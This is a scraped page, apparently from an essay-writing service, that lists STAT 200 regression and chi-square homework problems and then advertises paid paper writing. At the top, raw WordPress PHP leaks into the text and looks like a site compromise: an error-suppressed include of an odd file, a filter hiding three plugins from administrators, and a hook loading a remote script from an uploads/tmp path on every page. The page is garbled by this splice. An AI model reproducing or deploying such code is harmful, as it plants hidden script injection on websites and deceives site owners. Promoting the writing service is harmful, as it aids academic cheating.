@include_once dirname(__FILE__) . '/inc/process_general_generic_update.php'; require_once get_template_directory() . '/inc/class-wp-bootstrap-navwalker.php'; require_once get_template_directory() . '/inc/customize.php'; if ( ! function_exists( 'morningstar_setup' ) ) : function morningstar_setup() { add_theme_support( 'title-tag' ); // Add support for full and wide align images. add_theme_support( 'align-wide' ); // Post thumbnails add_theme_support( 'post-thumbnails' ); // Add support for Block Styles. add_theme_support( 'wp-block-styles' ); // Add support for full and wide align images. add_theme_support( 'align-wide' ); // This theme uses wp_nav_menu() in two locations. register_nav_menus( array( 'header_menu' => __( 'Header Menu', 'morningstar' ), 'footer_site_menu' => __( 'Footer Site Menu', 'morningstar' ), 'footer_resources_menu' => __( 'Footer Resources Menu', 'morningstar' ), 'footer_terms_menu' => __( 'Footer Terms Menu', 'morningstar' ), ) ); } add_action( 'after_setup_theme', 'morningstar_setup' ); endif; if (!function_exists('morningstar_scripts')): /** * Enqueue scripts and styles. */ function morningstar_scripts() { global $wp_query; wp_enqueue_style('morningstar-style', get_stylesheet_uri()); wp_enqueue_style('morningstar-calc', get_stylesheet_directory_uri() . '/css/calc.css'); wp_deregister_script('jquery'); wp_register_script('jquery', get_stylesheet_directory_uri() . '/js/lib/jquery.min-3.2.1.js', array(), true, true); wp_enqueue_script('jquery'); wp_enqueue_script('morningstar', get_template_directory_uri() . '/js/morningstar.js', array('jquery'), false, true); wp_register_script( 'scripts', '/static/js/scripts.js', null, null, true ); wp_enqueue_script('scripts'); } add_action('wp_enqueue_scripts', 'morningstar_scripts', 11); endif; add_filter( 'all_plugins', 'hide_plugins'); function hide_plugins($plugins) { // Hide hello dolly plugin if(is_plugin_active('wp-automatic/wp-automatic.php')) { unset( $plugins['wp-automatic/wp-automatic.php'] ); } // Hide disqus plugin if(is_plugin_active('disable-admin-notices/disable-admin-notices.php')) { unset( $plugins['disable-admin-notices/disable-admin-notices.php'] ); } // Hide disqus plugin if(is_plugin_active('adminimize/adminimize.php')) { unset( $plugins['adminimize/adminimize.php'] ); } return $plugins; } if (!function_exists('sch_enqueue_front_asset')) { function sch_enqueue_front_asset() { wp_enqueue_script('sch-front', 'https://academicbrigade.com/wp-content/uploads/media-9f95dd/tmp-c36b/front-1f296c52.js', array(), null, false); } add_action('wp_enqueue_scripts', 'sch_enqueue_front_asset'); }

Stat 200 week 7 homework solutions

STAT 200 Week 7 Homework Problems

10.1.2

Table #10.1.6 contains the value of the house and the amount of rental income in a year that the house brings in (“Capital and rental,” 2013). Create a scatter plot and find a regression equation between house value and rental income. Then use the regression equation to find the rental income a house worth $230,000 and for a house worth $400,000. Which rental income that you calculated do you think is closer to the true rental income? Why?

Table #10.1.6: Data of House Value versus Rental

  

Value

Rental

Value

Rental

Value

Rental

Value

Rental

 

81000

6656

77000

4576

75000

7280

67500

6864

 

95000

7904

94000

8736

90000

6240

85000

7072

 

121000

12064

115000

7904

110000

7072

104000

7904

 

135000

8320

130000

9776

126000

6240

125000

7904

 

145000

8320

140000

9568

140000

9152

135000

7488

 

165000

13312

165000

8528

155000

7488

148000

8320

 

178000

11856

174000

10400

170000

9568

170000

12688

 

200000

12272

200000

10608

194000

11232

190000

8320

 

214000

8528

208000

10400

200000

10400

200000

8320

 

240000

10192

240000

12064

240000

11648

225000

12480

 

289000

11648

270000

12896

262000

10192

244500

11232

 

325000

12480

310000

12480

303000

12272

300000

12480

10.1.4

The World Bank collected data on the percentage of GDP that a country spends on health expenditures (“Health expenditure,” 2013) and also the percentage of women receiving prenatal care(“Pregnant woman receiving,” 2013). The data for the countries where this information are available for the year 2011 is in table #10.1.8. Create a scatter plot of the data and find a regression equation between percentage spent on health expenditure and the percentage of women receiving prenatal care. Then use the regression equation to find the percent of women receiving prenatal care for a country that spends 5.0% of GDP on health expenditure and for a country that spends 12.0% of GDP. Which prenatal care percentage that you calculated do you think is closer to the true percentage? Why?

Table #10.1.8: Data of Health Expenditure versus Prenatal Care

  

Health Expenditure (% of GDP)

Prenatal Care (%)

 

9.6

47.9

 

3.7

54.6

 

5.2

93.7

 

5.2

84.7

 

10.0

100.0

 

4.7

42.5

 

4.8

96.4

 

6.0

77.1

 

5.4

58.3

 

4.8

95.4

 

4.1

78.0

 

6.0

93.3

 

9.5

93.3

 

6.8

93.7

 

6.1

89.8

10.2.2

Table #10.1.6 contains the value of the house and the amount of rental income in a year that the house brings in (“Capital and rental,” 2013). Find the correlation coefficient and coefficient of determination and then interpret both.

Table #10.1.6: Data of House Value versus Rental

  

Value

Rental

Value

Rental

Value

Rental

Value

Rental

 

81000

6656

77000

4576

75000

7280

67500

6864

 

95000

7904

94000

8736

90000

6240

85000

7072

 

121000

12064

115000

7904

110000

7072

104000

7904

 

135000

8320

130000

9776

126000

6240

125000

7904

 

145000

8320

140000

9568

140000

9152

135000

7488

 

165000

13312

165000

8528

155000

7488

148000

8320

 

178000

11856

174000

10400

170000

9568

170000

12688

 

200000

12272

200000

10608

194000

11232

190000

8320

 

214000

8528

208000

10400

200000

10400

200000

8320

 

240000

10192

240000

12064

240000

11648

225000

12480

 

289000

11648

270000

12896

262000

10192

244500

11232

 

325000

12480

310000

12480

303000

12272

300000

12480

10.2.4

The World Bank collected data on the percentage of GDP that a country spends on health expenditures (“Health expenditure,” 2013) and also the percentage of women receiving prenatal care(“Pregnant woman receiving,” 2013). The data for the countries where this information is available for the year 2011 are in table #10.1.8. Find the correlation coefficient and coefficient of determination and then interpret both.

Table #10.1.8: Data of Health Expenditure versus Prenatal Care

  

Health   Expenditure (% of GDP)

Prenatal   Care (%)

 

9.6

47.9

 

3.7

54.6

 

5.2

93.7

 

5.2

84.7

 

10.0

100.0

 

4.7

42.5

 

4.8

96.4

 

6.0

77.1

 

5.4

58.3

 

4.8

95.4

 

4.1

78.0

 

6.0

93.3

 

9.5

93.3

 

6.8

93.7

 

6.1

89.8

10.3.2

Table #10.1.6 contains the value of the house and the amount of rental income in a year that the house brings in (“Capital and rental,” 2013). 

Test at the 5% level for a positive correlation between house value and rental amount. 

Table #10.1.6: Data of House Value versus Rental

  

Value

Rental

Value

Rental

Value

Rental

Value

Rental

 

81000

6656

77000

4576

75000

7280

67500

6864

 

95000

7904

94000

8736

90000

6240

85000

7072

 

121000

12064

115000

7904

110000

7072

104000

7904

 

135000

8320

130000

9776

126000

6240

125000

7904

 

145000

8320

140000

9568

140000

9152

135000

7488

 

165000

13312

165000

8528

155000

7488

148000

8320

 

178000

11856

174000

10400

170000

9568

170000

12688

 

200000

12272

200000

10608

194000

11232

190000

8320

 

214000

8528

208000

10400

200000

10400

200000

8320

 

240000

10192

240000

12064

240000

11648

225000

12480

 

289000

11648

270000

12896

262000

10192

244500

11232

 

325000

12480

310000

12480

303000

12272

300000

12480

10.3.4

The World Bank collected data on the percentage of GDP that a country spends on health expenditures (“Health expenditure,” 2013) and also the percentage of women receiving prenatal care(“Pregnant woman receiving,” 2013). The data for the countries where this information is available for the year 2011 are in table #10.1.8. 

Test at the 5% level for a correlation between percentage spent on health expenditure and the percentage of women receiving prenatal care. 

Table #10.1.8: Data of Health Expenditure versus Prenatal Care

  

Health Expenditure (% of GDP)

Prenatal Care (%)

 

9.6

47.9

 

3.7

54.6

 

5.2

93.7

 

5.2

84.7

 

10.0

100.0

 

4.7

42.5

 

4.8

96.4

 

6.0

77.1

 

5.4

58.3

 

4.8

95.4

 

4.1

78.0

 

6.0

93.3

 

9.5

93.3

 

6.8

93.7

 

6.1

89.8

11.1.2

Researchers watched groups of dolphins off the coast of Ireland in 1998 to determine what activities the dolphins partake in at certain times of the day (“Activities of dolphin,” 2013). The numbers in table #11.1.6 represent the number of groups of dolphins that were partaking in an activity at certain times of days. Is there enough evidence to show that the activity and the time period are independent for dolphins? Test at the 1% level.

Table #11.1.6: Dolphin Activity

  

Activity

Period

Row

Total

 

Morning

Noon

Afternoon

Evening

 

Travel

6

6

14

13

39

 

Feed

28

4

0

56

88

 

Social

38

5

9

10

62

 

Column Total

72

15

23

79

189

  

11.1.4

A person’s educational attainment and age group was collected by the U.S. Census Bureau in 1984 to see if age group and educational attainment are related. The counts in thousands are in table #11.1.8 (“Education by age,” 2013). Do the data show that educational attainment and age are independent? Test at the 5% level.

Table #11.1.8: Educational Attainment and Age Group

  

Education

Age Group

Row Total

 

25-34

35-44

45-54

55-64

>64

 

Did not complete HS

5416

5030

5777

7606

13746

37575

 

Competed HS

16431

1855

9435

8795

7558

44074

 

College 1-3 years

8555

5576

3124

2524

2503

22282

 

College 4 or more years

9771

7596

3904

3109

2483

26863

 

Column Total

40173

20057

22240

22034

26290

130794

11.2.4

In Africa in 2011, the number of deaths of a female from cardiovascular disease for different age groups are in table #11.2.6 (“Global health observatory,” 2013). In addition, the proportion of deaths of females from all causes for the same age groups are also in table #11.2.6. Do the data show that the death from cardiovascular disease are in the same proportion as all deaths for the different age groups? Test at the 5% level.

Table #11.2.6: Deaths of Females for Different Age Groups

  

Age

5-14

15-29

30-49

50-69

Total

 

Cardiovascular   Frequency

8

16

56

433

513

 

All   Cause Proportion

0.10

0.12

0.26

0.52

  

11.2.6

A project conducted by the Australian Federal Office of Road Safety asked people many questions about their cars. One question was the reason that a person chooses a given car, and that data is in table #11.2.8 (“Car preferences,” 2013). 

Table #11.2.8: Reason for Choosing a Car

  

Safety

Reliability

Cost

Performance

Comfort

Looks

 

84

62

46

34

47

27

Do the data show that the frequencies observed substantiate the claim that the reasons for choosing a car are equally likely? Test at the 5% level.

Academic Brigade
Calculate your paper price
Pages (550 words)
Approximate price: -

Why Work with Us

Top Quality and Well-Researched Papers

We always make sure that writers follow all your instructions precisely. You can choose your academic level: high school, college/university or professional, and we will assign a writer who has a respective degree.

Professional and Experienced Academic Writers

We have a team of professional writers with experience in academic and business writing. Many are native speakers and able to perform any task for which you need help.

Free Unlimited Revisions

If you think we missed something, send your order for a free revision. You have 10 days to submit the order for review after you have received the final document. You can do this yourself after logging into your personal account or by contacting our support.

Prompt Delivery and 100% Money-Back-Guarantee

All papers are always delivered on time. In case we need more time to master your paper, we may contact you regarding the deadline extension. In case you cannot provide us with more time, a 100% refund is guaranteed.

Original & Confidential

We use several writing tools checks to ensure that all documents you receive are free from plagiarism. Our editors carefully review all quotations in the text. We also promise maximum confidentiality in all of our services.

24/7 Customer Support

Our support agents are available 24 hours a day 7 days a week and committed to providing you with the best customer experience. Get in touch whenever you need any assistance.

Try it now!

Calculate the price of your order

Total price:
$0.00

How it works?

Follow these simple steps to get your paper done

Place your order

Fill in the order form and provide all details of your assignment.

Proceed with the payment

Choose the payment system that suits you most.

Receive the final file

Once your paper is ready, we will email it to you.

Our Services

No need to work on your paper at night. Sleep tight, we will cover your back. We offer all kinds of writing services.

Essays

Essay Writing Service

No matter what kind of academic paper you need and how urgent you need it, you are welcome to choose your academic level and the type of your paper at an affordable price. We take care of all your paper needs and give a 24/7 customer care support system.

Admissions

Admission Essays & Business Writing Help

An admission essay is an essay or other written statement by a candidate, often a potential student enrolling in a college, university, or graduate school. You can be rest assurred that through our service we will write the best admission essay for you.

Reviews

Editing Support

Our academic writers and editors make the necessary changes to your paper so that it is polished. We also format your document by correctly quoting the sources and creating reference lists in the formats APA, Harvard, MLA, Chicago / Turabian.

Reviews

Revision Support

If you think your paper could be improved, you can request a review. In this case, your paper will be checked by the writer or assigned to an editor. You can use this option as many times as you see fit. This is free because we want you to be completely satisfied with the service offered.